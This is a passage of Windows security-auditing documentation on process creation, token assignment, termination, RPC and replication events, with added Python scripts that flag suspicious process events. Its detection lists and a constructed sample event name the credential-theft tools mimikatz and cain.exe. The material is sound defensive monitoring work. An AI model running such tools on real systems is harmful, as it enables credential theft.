process has been created” Process Information\New Process ID.

Creator Process Name [Version 2] [Type = UnicodeString]: full path and the name of the
executable for the process.
Process Command Line [Version 1, 2] [Type = UnicodeString]: contains the name of the executable
and the arguments that were passed to it. You must enable the “Administrative Templates\System\Audit
Process Creation\Include command line in process creation events” group policy to include the
command line in process creation events. By default, the Process Command Line field is empty.

Security Monitoring Recommendations

For 4688(S): A new process has been created.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

High-value accounts: You might have high-value domain or local accounts for which you need to monitor
each action. Examples of high-value accounts are database administrators, built-in local administrator
account, domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor all events with the “Creator Subject\Security ID” or “Target Subject\Security
ID” that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or
monitoring potential malicious actions. For example, you might need to monitor for use of an account
outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Creator Subject\Security
ID” or “Target Subject\Security ID” (with other information) to monitor how or when a particular
account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should
never be used.
Recommendation: Monitor all events with the “Creator Subject\Security ID” or “Target Subject\Security
ID” that corresponds to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform
actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Creator
Subject\Security ID” and “Target Subject\Security ID” for accounts that are outside the whitelist.

Accounts of different types: You might want to ensure that certain actions are performed only by certain
account types, for example, local or domain account, machine or user account, vendor or employee account,
and so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types,
review the “Creator Subject\Security ID” or “Target Subject\Security ID” to see whether the account type
is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are
not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor the specific events for the “Creator Subject\Security ID” or “Target
Subject\Security ID” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which
certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the
“Creator Subject\Security ID” or “Target Subject\Security ID” that you are concerned about.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Creator Subject\Security ID” or “Target Subject\Security ID” for names that
don’t comply with naming conventions.

If you have a pre-defined “New Process Name” or “Creator Process Name” for the process
reported in this event, monitor all events with “New Process Name” or “Creator Process Name”
not equal to your defined value.
You can monitor to see if “New Process Name” or “Creator Process Name” is not in a standard
folder (for example, not in System32 or Program Files) or is in a restricted folder (for example,
Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example
“mimikatz” or “cain.exe”), check for these substrings in “New Process Name” or “Creator
Process Name.”
It can be unusual for a process to run using a local account in either Creator Subject\Security ID
or in Target Subject\Security ID.
Monitor for Token Elevation Type with value TokenElevationTypeDefault (1) when Creator
Subject\Security ID lists a real user account, for example when Account Name doesn’t contain
the $ symbol. Typically this means that UAC is disabled for this account for some reason.
Monitor for Token Elevation Type with value TokenElevationTypeFull (2) on standard
workstations, when Creator Subject\Security ID lists a real user account, for example when Account
Name doesn’t contain the $ symbol. This means that a user ran a program using administrative
privileges.
You can also monitor for Token Elevation Type with value TokenElevationTypeFull (2) on
standard workstations, when a computer object was used to run the process, but that computer
object is not the same computer where the event occurs.
If you need to monitor all new processes with a specific Mandatory Label, for example S-1-16-20480
(Protected process), check the “Mandatory Label” in this event.
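The following is an added example, not part of the Microsoft documentation, that turns the 4688 recommendations above into checks over exported event XML: executables outside the standard folders or inside restricted ones, restricted substrings such as “mimikatz” in process names, a local account in either subject, TokenElevationTypeDefault (1) or TokenElevationTypeFull (2) used by a real user account on a workstation, a Mandatory Label of interest, and an empty Process Command Line (which means the “Include command line in process creation events” policy is not enabled). The first record is this page’s 4688 sample cut down to the fields the checks use; the second is constructed to trip the rules. The folder lists are illustrative assumptions, and the mapping of the %%1936/%%1937/%%1938 resource IDs written into TokenElevationType to types 1/2/3 is a known Windows convention that this page does not state.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Integrity-label SIDs, from the Mandatory Label table above.
MANDATORY_LABEL = {"S-1-16-0": "Untrusted", "S-1-16-4096": "Low", "S-1-16-8192": "Medium",
                   "S-1-16-8448": "Medium high", "S-1-16-12288": "High",
                   "S-1-16-16384": "System", "S-1-16-20480": "Protected process"}
# Resource-string IDs stored in TokenElevationType (%%1936/7/8 = types 1/2/3); assumption: a
# known Windows convention, not stated on this page.
TOKEN_ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}

# Illustrative folder policy (assumption); tune to your own build.
STANDARD_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
RESTRICTED_DIRS = ("\\temporary internet files\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")
RESTRICTED_WORDS = ("mimikatz", "cain.exe")   # the page's examples; extend per policy


def parse_event(xml_text):
    """Return (EventID, short computer name, {Data Name: value}) for one event record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    computer = root.find("e:System/e:Computer", NS).text.split(".")[0].upper()
    data = {d.get("Name"): (d.text or "").strip() for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, computer, data


def check_path(label, path):
    """Flag an executable in a restricted folder, outside standard folders, or with a restricted name."""
    p = path.lower()
    if any(r in p for r in RESTRICTED_DIRS):
        yield f"{label} in restricted folder: {path}"
    elif not p.startswith(STANDARD_DIRS):
        yield f"{label} outside standard folders: {path}"
    if any(w in p for w in RESTRICTED_WORDS):
        yield f"{label} contains restricted word: {path}"


def triage_4688(xml_text, is_workstation=True, label_of_interest="S-1-16-20480"):
    """Apply the 4688 recommendations to one record; returns a list of findings (empty = nothing)."""
    event_id, computer, d = parse_event(xml_text)
    if event_id != 4688:
        return []
    findings = list(check_path("New Process Name", d.get("NewProcessName", "")))
    findings += check_path("Creator Process Name", d.get("ParentProcessName", ""))

    subjects = {"Creator Subject": (d.get("SubjectUserName", ""), d.get("SubjectDomainName", "")),
                "Target Subject": (d.get("TargetUserName", ""), d.get("TargetDomainName", ""))}
    # Account names without a trailing "$" are real users rather than computer accounts.
    real_users = [n for n, _ in subjects.values() if n and not n.endswith("$")]
    for role, (name, domain) in subjects.items():   # local account: domain == this computer
        if name and not name.endswith("$") and domain.upper() == computer:
            findings.append(f"local account {domain}\\{name} used as {role}")

    elev = TOKEN_ELEVATION.get(d.get("TokenElevationType", ""))
    if elev == 1 and real_users:
        findings.append(f"TokenElevationTypeDefault (1) for user {real_users[0]}: UAC appears disabled")
    if elev == 2 and real_users and is_workstation:
        findings.append(f"TokenElevationTypeFull (2): {real_users[0]} ran the process elevated on a workstation")

    label = d.get("MandatoryLabel", "")
    if label == label_of_interest:
        findings.append(f"Mandatory Label {label} ({MANDATORY_LABEL.get(label, '?')})")
    if not d.get("CommandLine"):
        findings.append("Process Command Line empty: 'Include command line in process creation events' is off")
    return findings


# This page's 4688 sample, cut down to the fields the checks use.
PAGE_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4688</EventID><Computer>WIN-GG82ULGC9GO.contoso.local</Computer></System><EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data><Data Name="SubjectUserName">WIN-GG82ULGC9GO$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="NewProcessName">C:\Windows\System32\rundll32.exe</Data>
<Data Name="TokenElevationType">%%1938</Data><Data Name="CommandLine" />
<Data Name="TargetUserName">dadmin</Data><Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="ParentProcessName">C:\Windows\explorer.exe</Data>
<Data Name="MandatoryLabel">S-1-16-8192</Data></EventData></Event>"""

# Constructed record (not from the page): an elevated domain user launching a tool from %TEMP%
# while the target subject is a local account on the same machine.
SUSPECT_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4688</EventID><Computer>WIN-GG82ULGC9GO.contoso.local</Computer></System><EventData>
<Data Name="SubjectUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
<Data Name="SubjectUserName">dadmin</Data><Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="NewProcessName">C:\Users\dadmin\AppData\Local\Temp\mimikatz.exe</Data>
<Data Name="TokenElevationType">%%1937</Data>
<Data Name="CommandLine">"C:\Users\dadmin\AppData\Local\Temp\mimikatz.exe"</Data>
<Data Name="TargetUserName">localadmin</Data><Data Name="TargetDomainName">WIN-GG82ULGC9GO</Data>
<Data Name="ParentProcessName">C:\Windows\System32\cmd.exe</Data>
<Data Name="MandatoryLabel">S-1-16-12288</Data></EventData></Event>"""

if __name__ == "__main__":
    for name, record in (("page sample", PAGE_EVENT), ("constructed", SUSPECT_EVENT)):
        print(name, triage_4688(record))
```

Against the page’s own sample the only output is the empty-command-line note (the page says the field is empty by default); the constructed record produces four findings: a restricted folder, a restricted word, a local account in the Target Subject, and an elevated token used by a real user on a workstation. Pass is_workstation=False for servers, where the TokenElevationTypeFull (2) rule is expected noise, and set label_of_interest to whichever Mandatory Label you want every new process reported for.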
4696(S): A primary token was assigned to process.

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Process Creation
Event Description:
This event generates every time a process runs using a non-current access token, for example, a UAC
elevated token, RUN AS different user actions, a scheduled task with a defined user, services, and so on.
IMPORTANT: this event is deprecated starting from Windows 7 and Windows 2008 R2.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
    <EventID>4696</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13312</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-25T21:33:42.401Z" />
    <EventRecordID>561</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="88" />
    <Channel>Security</Channel>
    <Computer>Win2008.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">WIN2008$</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TargetUserSid">S-1-5-18</Data>
    <Data Name="TargetUserName">dadmin</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetLogonId">0x1c8c5</Data>
    <Data Name="TargetProcessId">0xf40</Data>
    <Data Name="TargetProcessName">C:\Windows\System32\WerFault.exe</Data>
    <Data Name="ProcessId">0x698</Data>
    <Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
  </EventData>
</Event>

Required Server Roles: this event is deprecated starting from Windows 7 and Windows 2008 R2.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “assign token to process” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “assign token to
process” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which started the new process with the
new security token. Process ID (PID) is a number used by the operating system to uniquely identify an active
process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process which ran
the new process with new security token.
Target Process:
Target Process ID [Type = Pointer]: hexadecimal Process ID of the new process with new security token. If you
convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.

You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has
been created” Process Information\New Process ID.

Target Process Name [Type = UnicodeString]: full path and the name of the executable for the new process.
New Token Information:
Security ID [Type = SID]: SID of account through which the security token will be assigned to the new process.
Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you
will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account through which the security token will be
assigned to the new process.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”

Security Monitoring Recommendations

For 4696(S): A primary token was assigned to process.

Type of monitoring required: High-value accounts. You might have high-value domain or local accounts for
which you need to monitor each action. Examples of high-value accounts are database administrators, built-in
local administrator account, domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “Subject\Security ID” or “New Token Information\Security ID”
that corresponds to the high-value account or accounts.

Type of monitoring required: Anomalies or malicious actions. You might have specific requirements for
detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use
of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” or
“New Token Information\Security ID” (with other information) to monitor how or when a particular account
is being used.

Type of monitoring required: Non-active accounts. You might have non-active, disabled, or guest accounts, or
other accounts that should never be used.
Recommendation: Monitor this event with the “Subject\Security ID” or “New Token Information\Security ID”
that corresponds to the accounts that should never be used.

Type of monitoring required: Account whitelist. You might have a specific whitelist of accounts that are the
only ones allowed to perform actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” and
“New Token Information\Security ID” for accounts that are outside the whitelist.

Type of monitoring required: Accounts of different types. You might want to ensure that certain actions are
performed only by certain account types, for example, local or domain account, machine or user account,
vendor or employee account, and so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review
the “Subject\Security ID” or “New Token Information\Security ID” to see whether the account type is as
expected.

Type of monitoring required: External accounts. You might be monitoring accounts from another domain, or
“external” accounts that are not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Security ID” or “New Token Information\Security ID”
corresponding to accounts from another domain or “external” accounts.

Type of monitoring required: Restricted-use computers or devices. You might have certain computers,
machines, or devices on which certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the
“Subject\Security ID” or “New Token Information\Security ID” that you are concerned about.

Type of monitoring required: Account naming conventions. Your organization might have specific naming
conventions for account names.
Recommendation: Monitor “Subject\Security ID” or “New Token Information\Security ID” for names that
don’t comply with naming conventions.

If you have a pre-defined “Process Name” or “Target Process Name” for the process reported in this
event, monitor all events with “Process Name” or “Target Process Name” not equal to your defined value.
You can monitor to see if “Process Name” or “Target Process Name” is not in a standard folder (for
example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet
Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name” or “Target Process Name”.
It can be uncommon for a process to run using a local account.
Audit Process Termination
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Process Termination determines whether the operating system generates audit events when a process has
exited.
Success audits record successful attempts and Failure audits record unsuccessful attempts.
This policy setting can help you track user activity and understand how the computer is used.
Event volume: Low to Medium, depending on system usage.

Computer Type: Domain Controller. General Success: No. General Failure: No. Stronger Success: IF. Stronger
Failure: No.
Comments: IF - This subcategory typically is not as important as the Audit Process Creation subcategory. Using
this subcategory you can, for example, get information about how long a process ran, by correlating with the
4688 event. If you have a list of critical processes that run on some computers, you can enable this subcategory
to monitor for termination of these critical processes. This subcategory doesn’t have Failure events, so there is
no recommendation to enable Failure auditing for this subcategory.

Computer Type: Member Server. General Success: No. General Failure: No. Stronger Success: IF. Stronger
Failure: No.
Comments: IF - This subcategory typically is not as important as the Audit Process Creation subcategory. Using
this subcategory you can, for example, get information about how long a process ran, by correlating with the
4688 event. If you have a list of critical processes that run on some computers, you can enable this subcategory
to monitor for termination of these critical processes. This subcategory doesn’t have Failure events, so there is
no recommendation to enable Failure auditing for this subcategory.

Computer Type: Workstation. General Success: No. General Failure: No. Stronger Success: IF. Stronger
Failure: No.
Comments: IF - This subcategory typically is not as important as the Audit Process Creation subcategory. Using
this subcategory you can, for example, get information about how long a process ran, by correlating with the
4688 event. If you have a list of critical processes that run on some computers, you can enable this subcategory
to monitor for termination of these critical processes. This subcategory doesn’t have Failure events, so there is
no recommendation to enable Failure auditing for this subcategory.

Events List:
4689(S): A process has exited.
4689(S): A process has exited.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Process Termination
Event Description:
This event generates every time a process has exited.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4689</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13313</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-27T17:13:01.826339500Z" />
    <EventRecordID>187030</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="144" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x31365</Data>
    <Data Name="Status">0x0</Data>
    <Data Name="ProcessId">0xfb0</Data>
    <Data Name="ProcessName">C:\Windows\System32\notepad.exe</Data>
  </EventData>
</Event>
Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “terminate process” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “terminate process”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the ended/terminated process. Process ID (PID) is a
number used by the operating system to uniquely identify an active process. To see the PID for a specific
process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688(S): A new
process has been created” New Process ID on this computer.
Process Name [Type = UnicodeString]: full path and the executable name of the exited/terminated process.
Exit Status [Type = HexInt32]: hexadecimal exit code of exited/terminated process. This exit code is unique
for every application, check application documentation for more details. The exit code value for a process
reflects the specific convention implemented by the application developer for that process.

Security Monitoring Recommendations

For 4689(S): A process has exited.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
If you have a list of critical processes for the computer, with the requirement that these processes must always
run and not stop, you can monitor the Process Name field in 4689 events for these process names.
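The process-name and local-account checks recommended for 4696 (in the section above) and for 4689 (this section), as one added example; it is not code from the Microsoft documentation. It parses the events' XML with the standard library, applies the standard-folder, restricted-folder, restricted-substring and local-account rules, and for 4689 also watches a critical-process list and reports the Exit Status. The folder lists, the critical-process list, the second 4696 event, and the rule that a local account's Account Domain equals the computer's NetBIOS name are assumptions; the other two events are trimmed from the samples on the page.

```python
"""Process-name and account checks for 4696 and 4689 Security events (added example,
not Microsoft's code). Folder lists and the critical-process list are assumptions."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Lower-case prefixes; the trailing separator stops "c:\windows\system32x\" matching.
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\",)   # restricted folder named on the page
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")          # substrings named on the page
CRITICAL_PROCESSES = {"c:\\windows\\system32\\notepad.exe"}  # constructed must-keep-running list


def parse_event(xml_text):
    """Return (EventID, Computer, {Data Name: value}) for one Security event."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return int(system.find("e:EventID", NS).text), system.find("e:Computer", NS).text, data


def process_name_findings(field, path):
    """Standard-folder, restricted-folder and restricted-substring checks on one path."""
    p = path.lower()
    findings = []
    if not p.startswith(STANDARD_FOLDERS):
        findings.append(f"{field} {path} is outside the standard folders")
    if any(folder in p for folder in RESTRICTED_FOLDERS):
        findings.append(f"{field} {path} is inside a restricted folder")
    findings += [f"{field} {path} contains restricted substring {s!r}"
                 for s in RESTRICTED_SUBSTRINGS if s in p]
    return findings


def is_local_account(account_domain, computer):
    # Assumption: a local account's Account Domain is the computer's own NetBIOS name.
    return account_domain.upper() == computer.split(".")[0].upper()


def check_4696(xml_text):
    event_id, computer, d = parse_event(xml_text)
    if event_id != 4696:
        return []
    findings = process_name_findings("Process Name", d["ProcessName"])
    findings += process_name_findings("Target Process Name", d["TargetProcessName"])
    for role, domain_key, name_key in (("Subject", "SubjectDomainName", "SubjectUserName"),
                                       ("New Token Information", "TargetDomainName", "TargetUserName")):
        if is_local_account(d[domain_key], computer):
            findings.append(f"{role} {d[domain_key]}\\{d[name_key]} is a local account")
    return findings


def check_4689(xml_text, critical=CRITICAL_PROCESSES):
    event_id, computer, d = parse_event(xml_text)
    if event_id != 4689:
        return []
    findings = process_name_findings("Process Name", d["ProcessName"])
    if d["ProcessName"].lower() in critical:
        findings.append(f"critical process {d['ProcessName']} exited on {computer} "
                        f"with Exit Status {d['Status']}")
    return findings


# Trimmed from the page's 4696 sample (System reduced to the elements used here).
PAGE_4696 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4696</EventID><Computer>Win2008.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserName">WIN2008$</Data><Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="TargetUserName">dadmin</Data><Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetProcessName">C:\Windows\System32\WerFault.exe</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
</EventData></Event>"""

# Constructed 4696: a local account and a target process in a restricted folder.
SUSPECT_4696 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4696</EventID><Computer>Win2008.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserName">localadmin</Data><Data Name="SubjectDomainName">WIN2008</Data>
<Data Name="TargetUserName">dadmin</Data><Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetProcessName">C:\Users\dadmin\AppData\Local\Microsoft\Windows\Temporary Internet Files\mimikatz.exe</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
</EventData></Event>"""

# Trimmed from the page's 4689 sample.
PAGE_4689 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4689</EventID><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserName">dadmin</Data><Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="Status">0x0</Data><Data Name="ProcessId">0xfb0</Data>
<Data Name="ProcessName">C:\Windows\System32\notepad.exe</Data>
</EventData></Event>"""

if __name__ == "__main__":
    for ev in (PAGE_4696, SUSPECT_4696):
        print(check_4696(ev) or ["ok"])
    print(check_4689(PAGE_4689))
```

The prefix comparison is done on the lower-cased path with the trailing separator kept, so a folder that merely begins with "System32" does not pass as the standard folder; the Exit Status is reported verbatim because, as the field description says, its meaning is specific to each application.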
Audit RPC Events
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit RPC Events determines whether the operating system generates audit events when inbound remote
procedure call (RPC) connections are made.

Computer Type: Domain Controller. General Success: No. General Failure: No. Stronger Success: No. Stronger
Failure: No.
Comments: Events in this subcategory occur rarely.

Computer Type: Member Server. General Success: No. General Failure: No. Stronger Success: No. Stronger
Failure: No.
Comments: Events in this subcategory occur rarely.

Computer Type: Workstation. General Success: No. General Failure: No. Stronger Success: No. Stronger
Failure: No.
Comments: Events in this subcategory occur rarely.

Events List:
5712(S): A Remote Procedure Call (RPC) was attempted.
5712(S): A Remote Procedure Call (RPC) was attempted.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
It appears that this event never occurs.
Subcategory: Audit RPC Events
Event Schema:
A Remote Procedure Call (RPC) was attempted.
Subject:

SID:%1
Name:%2
Account Domain:%3
LogonId:%4

Process Information:

PID:%5 Name:%6

Network Information:

Remote IP Address:%7
Remote Port:%8

RPC Attributes:

Interface UUID:%9
Protocol Sequence:%10
Authentication Service:%11
Authentication Level:%12

Required Server Roles: no information.
Minimum OS Version: no information.
Event Versions: 0.
Security Monitoring Recommendations
There is no recommendation for this event in this document.
Audit Detailed Directory Service Replication
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Detailed Directory Service Replication determines whether the operating system generates audit events
that contain detailed tracking information about data that is replicated between domain controllers.
This audit subcategory can be useful to diagnose replication issues.
Event volume: These events can create a very high volume of event data on domain controllers.

Computer Type: Domain Controller. General Success: No. General Failure: No. Stronger Success: IF. Stronger
Failure: IF.
Comments: IF - Events in this subcategory typically have an informational purpose and it is difficult to detect
any malicious activity using these events. It’s mainly used for Active Directory replication troubleshooting.

Computer Type: Member Server. General Success: No. General Failure: No. Stronger Success: No. Stronger
Failure: No.
Comments: This subcategory makes sense only on domain controllers.

Computer Type: Workstation. General Success: No. General Failure: No. Stronger Success: No. Stronger
Failure: No.
Comments: This subcategory makes sense only on domain controllers.

Events List:
4928(S, F): An Active Directory replica source naming context was established.
4929(S, F): An Active Directory replica source naming context was removed.
4930(S, F): An Active Directory replica source naming context was modified.
4931(S, F): An Active Directory replica destination naming context was modified.
4934(S): Attributes of an Active Directory object were replicated.
4935(F): Replication failure begins.
4936(S): Replication failure ends.
4937(S): A lingering object was removed from a replica.
4928(S, F): An Active Directory replica source naming context was established.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory Service Replication
Event Description:
This event generates every time a new Active Directory replica source naming context is established.
Failure event generates if an error occurs (Status Code != 0).

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4928</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14083</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-27T19:15:30.067319300Z" />
    <EventRecordID>227065</EventRecordID>
    <Correlation />
    <Execution ProcessID="524" ThreadID="1236" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
